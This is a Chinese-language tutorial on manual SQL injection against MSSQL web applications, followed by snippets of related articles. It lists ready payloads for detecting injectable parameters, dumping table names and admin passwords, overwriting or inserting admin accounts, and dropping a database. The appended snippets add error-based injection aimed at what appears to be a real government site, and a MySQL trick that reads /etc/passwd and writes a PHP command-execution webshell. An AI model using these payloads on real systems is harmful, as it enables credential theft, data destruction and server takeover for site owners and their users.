mssql手工注入

判断注入点：

1、数字型

http://www.targer.com/article.aspx?id=1

http://www.targer.com/article.aspx?id=1‘

http://www.targer.com/article.aspx?id=1 and 1=1

http://www.targer.com/article.aspx?id=1 and 1=2

2、字符型

http://www.targer.com/article.aspx?action=value‘ and 1=1

http://www.targer.com/article.aspx?action=value‘ and 1=2

3、搜索型

searchpoints%‘ and 1=1

searchpoints%‘ and 1=2

确定数据库类型：

http://www.targer.com/article.aspx?id=1 and user>0

http://www.targer.com/article.aspx?id=1 and (select count(*) from sysobjects)>0

查询当前用户数据信息：

article.aspx?id=1 having 1=1--

暴当前表中的列：

article.aspx?id=1 group by admin.username having 1=1--

article.aspx?id=1 group by admin.username,admin.password having 1=1--

暴任意表和列：

and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1

and (select top col_name(object_id(‘admin‘),N) from sysobjects)>1

暴数据库数据：

and (select top 1 password from admin where id=N)>1

修改数据库中的数据：

;update admin set password=‘oooooo‘ where username=‘xxx‘

增添数据库中的数据：

;insert into admin values (xxx,oooooo)--

删除数据库：

;drop database webdata

常用SQL总结：

获取当前数据库用户名：and user>0

获取当前数据库名：and db_name()>0

获取数据库版本：and (select @@version)>0

判断是否支持多句查询：;declare @a int--

判断是否支持子查询：and (select count(1) from [sysobjects])>=0

原文地址：http://wenku.baidu.com/link?url=HUz29K2oQStQY5xhqX84mI622D0tjsiuBN-seONO9YYf0OM12KlEs3Sw5pxwu1Iw2INeWJ-njqNKCWM2d7rMZ1cATTWiyBep5WO0bC2EFjW

时间： 2024-10-11 07:38:07

mssql手工注入的相关文章

MSSQL手工注入辅助工具

mssql > 基本环境信息语句及说明 #数据库版本 SELECT @@version #主机名,IP地址 SELECT HOST_NAME() #当前用户 SELECT user_name(); SELECT system_user; SELECT user; SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID #列出所有用户 SELECT name FROM master..syslogins #列密码 mssql 2

MSSQL手工注入报错注入方法

例子:www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1[1]首先爆版本:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0 原因:@@version是mssql 的全局变量,如果我们把它写成这样 and @@version>0 那个后面的mssql就会强行把@@version 强行转换成数字,但是失败,所以就会将数据库信息暴露出来同样:通过@@SERVERNAME:爆

学习笔记 MSSQL显错手工注入

和朋友一起学习,速度就是快.感谢珍惜少年时. 网上很多都在长篇大论MSSQL显错手工注入,其实原理只有一小段.如下: ' and (查询一段内容)=1 and 'C'='Cnvarchar类型(查询一段内容的返回) 会自动转换int类型 ,肯定会转换失败.然后报错将nvarchar类型(查询一段内容的返回) 的值显示出来. 由这个原理衍生出单字段查询.如下: ' and 0=(SELECT top 1 username FROM table) and 'C'='C 然后有衍生出多字段查询.如下:

手工注入基本思路

手工注入说下我的基本思路:1.目标站点环境为:Windows+Apache+Mysql+PHP2.存在SQL注入,能否直接写一句话木马3.存在SQL注入,获取数据库中用户口令,登录应用系统后上传webshell4.获取数据库口令登录phpMyAdimin,用phpMyAdmin写入一句话木马不想因为使用扫描工具的缘故,导致服务器出现不稳定的现象,所以就纯手工咯.下面具体来说明下:1.尝试1=1的情况,正确 http://xxx/xxx.php?id=2900 and 1=1 复制代码 2.尝

mysql手工注入

information_schema SQL基础 1.1 什么是sql? SQL(structured query language),即结构化查询语言,是关系数据库的标准语言,SQL是一个通用的.功能强大的关系数据库语言,但其功能并不仅仅是查询. 1.2 mysql MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品.另外,MySQL是一种关联数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速

手工注入

...gong.com/about.asp?dd=613' //出错再来 ...gong.com/about.asp?dd=613 and 1=1 //正常 ...gong.com/about.asp?dd=613 and 1=2//出错一个注入点 ...gong.com/about.asp?dd=613 order by 1 //正常 ...gong.com/about.asp?dd=613 order by 19 //正常 ...gong.com/about.asp?dd=613 ord

sql工具和手工注入总结

普通注入: 数字注入字符注入 base64注入:和常规的方法没有说明区别,主要是解码然后编码: 如果普通注入不行,尝试大小写绕过,编码等绕过: 如果不行尝试盲注: 盲注: 基于报错的注入(随笔有总结) 延时注入:利用数据库延时特性,sleep(10),没有报错就说明存在注入或者尝试cookie注入: cookie注入: 穿山甲(有cookie选项) sqlmap使用:sqlmap.py -u "http:www.xx.com/show.asp" --cookie "id=

SQL注入原理手工注入access数据库

SQL注入原理手工注入access数据库 SQL注入是通过将SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL指令的目的. 1.判断网站是否有注入点. 在以asp?id=xx(任意数字)结尾的连接依次添加: ' 1=1 1=2 若以上结果显示"数据库出错","正常显示","数据库出错"则该网站存在注入点. 2.猜解表名在链接末尾添加语句: and exists(select * from admi

小白日记40：kali渗透测试之Web渗透-SQL手工注入（二）-读取文件、写入文件、反弹shell

SQL手工注入 1.读取文件[load_file函数] ' union SELECT null,load_file('/etc/passwd')--+ burpsuite 2.写入文件 ' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+ [写入一句话木马:INTO DUMPLING:MySQL函数,将输入下载在数据库中]